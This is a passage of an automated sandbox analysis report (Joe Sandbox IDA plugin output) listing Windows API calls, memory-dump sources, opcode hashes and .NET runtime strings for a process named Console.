                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(03C27EDC,7CAB6A82,?,00000000,00000000,7CAB6A82,?,00000000), ref: 0107EF74
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3168844106-0
                                                                                                                                                                                                                          • Opcode ID: 77d2862647c1b6eeddac2e8d66bca2a51f5cb930cc08251bfc56aa87d439146c
                                                                                                                                                                                                                          • Instruction ID: e3598b47c09ae343f05c9d99b6173bb1166fe4c3a251df2bcc4faad6506bcb80
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 77d2862647c1b6eeddac2e8d66bca2a51f5cb930cc08251bfc56aa87d439146c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D271CE71E02205DFEB24CF58C844BAABFF4EB44710F1989AEE995AB391C7749900CB94
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,00000008,?), ref: 011345A6
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3298025750-0
                                                                                                                                                                                                                          • Opcode ID: 287a36ae766a9d39e9efa8678440afffc3ef9609878b1824d5d0be339caaf790
                                                                                                                                                                                                                          • Instruction ID: 3cb1b12ebcc5a82ca09daceb4e5f66df3ea5cb0a65d42a2c3d4862cb2ad6c397
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 287a36ae766a9d39e9efa8678440afffc3ef9609878b1824d5d0be339caaf790
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3851CF75A04206DFDB19CF1CD5809AEB7B2FF89310F1486A9D8449BB09D730AD51CB91
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00FFE830: EnterCriticalSection.KERNEL32(00000000,?,00000000,03C176F0,00000000,?,010E27AE,?,01229EF5), ref: 00FFE8B9
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,7CAB6A82,?,?), ref: 01414A51
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3168844106-0
                                                                                                                                                                                                                          • Opcode ID: ff28e08d2e395fd50a685d0bc88ab62a2d89d10ff1755ed87645715d1d467414
                                                                                                                                                                                                                          • Instruction ID: c41c1d76892c675e6d002b9ec897ec5b0e22d6131a9d56eab295b1a7cc4e0549
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ff28e08d2e395fd50a685d0bc88ab62a2d89d10ff1755ed87645715d1d467414
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 17515F75A0020A8FDB14CFADC980AAEBBF5FF48310F19456AE919E7365D734A901CB94
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,05CAA940,?,00000000), ref: 0108D2AA
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3298025750-0
                                                                                                                                                                                                                          • Opcode ID: 863a147a18b27d64b6be88e30fbb0cb828a77e98a95d2af737f7323414ff4e4a
                                                                                                                                                                                                                          • Instruction ID: 2b6010e2aaa2118f54b8c3fd815fa5385dc12b483abe4b50a56736d43fea49c8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 863a147a18b27d64b6be88e30fbb0cb828a77e98a95d2af737f7323414ff4e4a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B641B1B1A00205DFDB14DF99D940BAEBBF5EF55320F04416EE915E7390DB70A900CB94
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(03C5C530,?,7CAB6A82,0CB3F4BC,CEA1900B,?), ref: 00FCCF74
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalLeaveSection
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3988221542-0
                                                                                                                                                                                                                          • Opcode ID: 3d8505328a3470d9926ca441ce94d1b066ce6accc71ca0b445516ed0cb78ef73
                                                                                                                                                                                                                          • Instruction ID: 417462a7fe5b9843457179972cd2b45ee5f77d3649217fbc37e9b0a826938567
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3d8505328a3470d9926ca441ce94d1b066ce6accc71ca0b445516ed0cb78ef73
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 58218D75A006059FCB20CF69D985B9AFBB4FF59720F14825EEC18A7391D7359900DBE0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,016445B0,00000000,00000000,00000000,00000000,00000000), ref: 012D4136
                                                                                                                                                                                                                            • Part of subcall function 012CCB10: LeaveCriticalSection.KERNEL32(00000000,7CAB6A82,?), ref: 012CCB9E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalFreeHeapLeaveSection
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 681598451-0
                                                                                                                                                                                                                          • Opcode ID: 34521455557d2ea74a098c31a3fcc00d48131673477332907f3c9d32d3ed93e1
                                                                                                                                                                                                                          • Instruction ID: 09d7e5b7baf57ab25ac121603779e860b6e5105fb6cd5f7f8d47201093b82f71
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 34521455557d2ea74a098c31a3fcc00d48131673477332907f3c9d32d3ed93e1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DD21463372051A5BCB21BEA8DC01EABB758EFA5661F00021AFF1497290EA31C82197D1
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 012C2FD0: HeapFree.KERNEL32(00000000,015A58D0,00000000), ref: 012C3068
                                                                                                                                                                                                                            • Part of subcall function 012C8E60: HeapFree.KERNEL32(00000000,015A9D08,00000000), ref: 012C8EF8
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,015A9CB8,00000000), ref: 012B60F2
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3298025750-0
                                                                                                                                                                                                                          • Opcode ID: ca605a8074d5e4f23169343e0b3fa13b8ac6f2dc215b1b0f1d03ae4819765743
                                                                                                                                                                                                                          • Instruction ID: 73d51f8f247dff9f094ed9507f7cd44b9ff1e3d776212c6afb253a30104050ba
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ca605a8074d5e4f23169343e0b3fa13b8ac6f2dc215b1b0f1d03ae4819765743
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 77214F70A90309ABFB24DF94DD46BAE7AB1EB00B04F208519B7117F2C4CBF529148B95
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1628315508.0000000005AA0000.00000020.00001000.00040000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_5aa0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Sleep
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3472027048-0
                                                                                                                                                                                                                          • Opcode ID: 9643b01f5b22798312f3a04d117c65c74d11b886562e64580215059b41070737
                                                                                                                                                                                                                          • Instruction ID: 9ba9dadc952de56145ab21c4c1e75aed9e86236da7071e542e35581cd3b577e0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9643b01f5b22798312f3a04d117c65c74d11b886562e64580215059b41070737
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 05213D72B002095FCB19BBAC85A47EEBBE6DB94384F14412DD253EB7C0CB66D845C7A1
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1634866215.000000000CB40000.00000020.00001000.00040000.00000000.sdmp, Offset: 0CB40000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_cb40000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Sleep
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3472027048-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(01649F60,7CAB6A82,00000000), ref: 01418EE0
                                                                                                                                                                                                                            • Part of subcall function 01418480: GetSystemInfo.KERNEL32(0163F09C,7CAB6A82,00000000,?,00000000), ref: 0141850C
                                                                                                                                                                                                                            • Part of subcall function 01418480: SetConsoleCtrlHandler.KERNEL32(01418330,00000001,?,00000000), ref: 0141852D
                                                                                                                                                                                                                            • Part of subcall function 01418480: GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000), ref: 01418538
                                                                                                                                                                                                                            • Part of subcall function 01418480: GetProcAddress.KERNEL32(00000000,InitializeContext2), ref: 01418544
                                                                                                                                                                                                                            • Part of subcall function 01418480: GetModuleHandleW.KERNEL32(ntdll.dll,?,00000000), ref: 01418554
                                                                                                                                                                                                                            • Part of subcall function 01418480: GetProcAddress.KERNEL32(00000000,RtlRestoreContext), ref: 01418566
                                                                                                                                                                                                                            • Part of subcall function 01418480: InitializeCriticalSection.KERNEL32(0163EE00,?,00000000), ref: 014185B4
                                                                                                                                                                                                                            • Part of subcall function 01418480: InitializeCriticalSection.KERNEL32(0163EE24,?,00000000), ref: 014185E5
                                                                                                                                                                                                                            • Part of subcall function 01418480: InitializeCriticalSection.KERNEL32(0163EAD0,?,00000000), ref: 01418616
                                                                                                                                                                                                                            • Part of subcall function 01418480: InitializeCriticalSection.KERNEL32(0163EFC8,?,00000000), ref: 01418649
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalInitializeSection$AddressHandleModuleProc$ConsoleCtrlHandlerInfoSystem
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 722453380-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0121AE20: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(7CAB6A82,93F80028,0CB3F4BC,00004000), ref: 0121AE8E
                                                                                                                                                                                                                            • Part of subcall function 0121AE20: wcstoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,?,?), ref: 0121AEA2
                                                                                                                                                                                                                            • Part of subcall function 0121AE20: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0121AEAE
                                                                                                                                                                                                                            • Part of subcall function 0121AE20: HeapFree.KERNEL32(00000000,00000000), ref: 0121AED2
                                                                                                                                                                                                                            • Part of subcall function 0121AE20: HeapFree.KERNEL32(00000000,00000000,7CAB6A82,93F80028,0CB3F4BC,00004000), ref: 0121AF0F
                                                                                                                                                                                                                            • Part of subcall function 0121AF80: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,0151591C,?,01136CBA), ref: 0121AFD0
                                                                                                                                                                                                                          • _wfopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,0159E42C,7CAB6A82,00000000,00000000,?,C0000000,014C57BD,000000FF), ref: 01063481
                                                                                                                                                                                                                          • fgets.API-MS-WIN-CRT-STDIO-L1-1-0(?,00004000,00000000,000000FF), ref: 010634CF
                                                                                                                                                                                                                          • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 01064010
                                                                                                                                                                                                                            • Part of subcall function 010688C0: __stdio_common_vsscanf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,000000FF,?,00000000,010634F8,?,010634F8,?,*** START PGO Data, max index = %u ***,?), ref: 010688E2
                                                                                                                                                                                                                          • fgets.API-MS-WIN-CRT-STDIO-L1-1-0(?,00004000,00000000,?,?,?,?,?,?,?,?,?,?,00000000,00FC0000), ref: 01063511
                                                                                                                                                                                                                          • fgets.API-MS-WIN-CRT-STDIO-L1-1-0(?,00004000,00000000), ref: 01063FA6
                                                                                                                                                                                                                            • Part of subcall function 01063320: fgets.API-MS-WIN-CRT-STDIO-L1-1-0(?,000000FF,00000000,00000000), ref: 01063343
                                                                                                                                                                                                                            • Part of subcall function 01063320: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 01063357
                                                                                                                                                                                                                            • Part of subcall function 01063320: fgets.API-MS-WIN-CRT-STDIO-L1-1-0(?,000000FF,00000000), ref: 0106337B
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 01063676
                                                                                                                                                                                                                          • fgets.API-MS-WIN-CRT-STDIO-L1-1-0(?,00004000,00000000), ref: 010636EF
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 010638A3
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 010638D1
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 01063962
                                                                                                                                                                                                                          • fgets.API-MS-WIN-CRT-STDIO-L1-1-0(?,00004000,?,?), ref: 0106381C
                                                                                                                                                                                                                            • Part of subcall function 01215D00: GetProcessHeap.KERNEL32(00000002,00FCFE3B,00000002,?,00000002,00FCF1D3,80131623,?,?,7CAB6A82,00000002), ref: 01215D0C
                                                                                                                                                                                                                            • Part of subcall function 01215D00: RtlAllocateHeap.NTDLL(03BF0000,00000000,?,00000002,00FCFE3B,00000002,?,00000002,00FCF1D3,80131623,?,?,7CAB6A82), ref: 01215D28
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 01063A2E
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 01063B23
                                                                                                                                                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,TypeHandle: ,0000000C), ref: 01063BB8
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 01063BD0
                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,NULL), ref: 01063C13
                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,UNKNOWN), ref: 01063C2C
                                                                                                                                                                                                                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 01063C3F
                                                                                                                                                                                                                            • Part of subcall function 00FCDFF0: HeapFree.KERNEL32(00000000,?,?,?,?,?,00FCE09A,?,?,00000004,00000000,00FC0000,00000001,?,?,0122C9D1), ref: 00FCE038
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?), ref: 01063FD9
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?), ref: 01063FFF
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,7CAB6A82,00000000,00000000,?,C0000000,014C57BD,000000FF), ref: 01064046
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$Free$fgets$_errnostrcmpstrlen$AllocateProcess__stdio_common_vsscanf_wfopenfclosemallocstrncmpwcstoul
                                                                                                                                                                                                                          • String ID: %u$%u %u$*** START PGO Data, max index = %u ***$@@@ codehash 0x%08X methodhash 0x%08X ilSize 0x%08X records 0x%08X$NULL$None$Schema InstrumentationKind %u ILOffset %u Count %u Other %u$TypeHandle: $UNKNOWN
                                                                                                                                                                                                                          • API String ID: 1772327721-2398891802
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(HeapVerify,GCLOHThreshold,00000000,00000000,00FC0000), ref: 010DC773
                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(HeapVerify,GCHeapHardLimit), ref: 010DC7C9
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: strcmp
                                                                                                                                                                                                                          • String ID: GCHeapHardLimit$GCHeapHardLimitLOH$GCHeapHardLimitLOHPercent$GCHeapHardLimitPOH$GCHeapHardLimitPOHPercent$GCHeapHardLimitPercent$GCHeapHardLimitSOH$GCHeapHardLimitSOHPercent$GCLOHThreshold$HeapVerify
                                                                                                                                                                                                                          • API String ID: 1004003707-1810996416
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 012D67D0: GetCommandLineW.KERNEL32(00000000,00000000,?,?,?,012D9EF0,?,00000000), ref: 012D67E7
                                                                                                                                                                                                                            • Part of subcall function 012D67D0: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000), ref: 012D685F
                                                                                                                                                                                                                            • Part of subcall function 012D67D0: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,012DAC36), ref: 012D6882
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000), ref: 012DA49D
                                                                                                                                                                                                                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,012DAF5F), ref: 012DA4AD
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 012DA4C9
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,012DAF5F), ref: 012DA4D8
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,012DAF5F), ref: 012DA535
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,012DAF5F), ref: 012DA543
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,012DAF5F), ref: 012DA551
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,012DAF5F), ref: 012DA562
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,012DAF5F), ref: 012DA573
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,012DAF5F), ref: 012DA584
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,Windows,000000FF,00000000,00000000), ref: 012DA5BE
                                                                                                                                                                                                                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,012DAF5F), ref: 012DA5D5
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,Windows,000000FF,00000000,00000000), ref: 012DA5F8
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,012DAF5F), ref: 012DA603
                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,012DAF5F), ref: 012DA670
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: free$ByteCharMultiWide$malloc$CommandCurrentLineProcessstrcmp
                                                                                                                                                                                                                          • String ID: 8.0.4$DOTNET_IPC_V1$Failed to send DiagnosticsIPC response$Windows$win-x86$x86
                                                                                                                                                                                                                          • API String ID: 1425245846-2645746373
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 012D67D0: GetCommandLineW.KERNEL32(00000000,00000000,?,?,?,012D9EF0,?,00000000), ref: 012D67E7
                                                                                                                                                                                                                            • Part of subcall function 012D67D0: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000), ref: 012D685F
                                                                                                                                                                                                                            • Part of subcall function 012D67D0: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,012DAC36), ref: 012D6882
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000), ref: 012DA17A
                                                                                                                                                                                                                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 012DA18A
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,15FF0164,000000FF,00000000,00000000), ref: 012DA1A6
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 012DA1B5
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(A19C35FF), ref: 012DA20C
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 012DA21A
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 012DA228
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(006A1024), ref: 012DA239
